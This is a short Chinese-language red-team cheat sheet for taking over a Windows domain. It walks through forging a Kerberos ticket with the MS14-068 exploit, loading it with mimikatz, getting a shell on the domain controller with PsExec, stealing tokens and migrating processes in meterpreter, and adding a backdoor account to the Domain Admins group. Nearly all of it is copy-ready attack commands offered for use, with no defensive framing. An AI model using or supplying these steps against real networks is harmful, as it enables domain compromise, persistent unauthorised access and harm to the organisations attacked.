MS14-068
第一步:利用MS14-068伪造生成TGT
MS14-068.exe -u test@coleak.com -p 123456 -s S-1-5-21-2801122135-3886333168-
273474972-1103 -d dc.coleak.com
第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书
mimikatz
kerberos::ptc TGT_test@coleak.com.ccache
第三步:获取域管理员权限
PsExec.exe \\dc cmd.exe
权限维持
// 添加test用户net user test 123456 /add /domain
// 把 test 用户添加进域管理员组net group "domain admins" test /add /domain
// 查看域管理员net group "domain admins" /domain
窃取域管理员令牌
当有域控账户登陆至服务器时可使用令牌模拟取得域控权限。
1、入侵域管理员所在的服务器,窃取域管理员的令牌,从而控制整个域。
2、直接在 meterpreter shell 上执行添加域管理员
add_user test abc123! -h 域控的IP地址
add_group_user "Domain Admins" test -h 域控IP地址
进程迁移
入侵了域管理员所登录的服务器,将进程迁移到域管理员所运行的进程,就可以获得域管理员权限。
1、获取域管理员列表
net group "Domain Admins" /domain
2、利用ps找到域管理员(redteam/administrator)所运行的进程,然后将shell进程迁移到域管理员所运行的进程中,成功后就获得了域管理员权限。
利用CS 或者 msf 都比较容易实现
3、输入shell命令获取OS shell,在本机上使用Windows命令添加新的域管理员:
# 添加test用户
net user test admin@123 /add /domain
# 把 test 用户添加进域管理员组
net group "domain admins" test /add /domain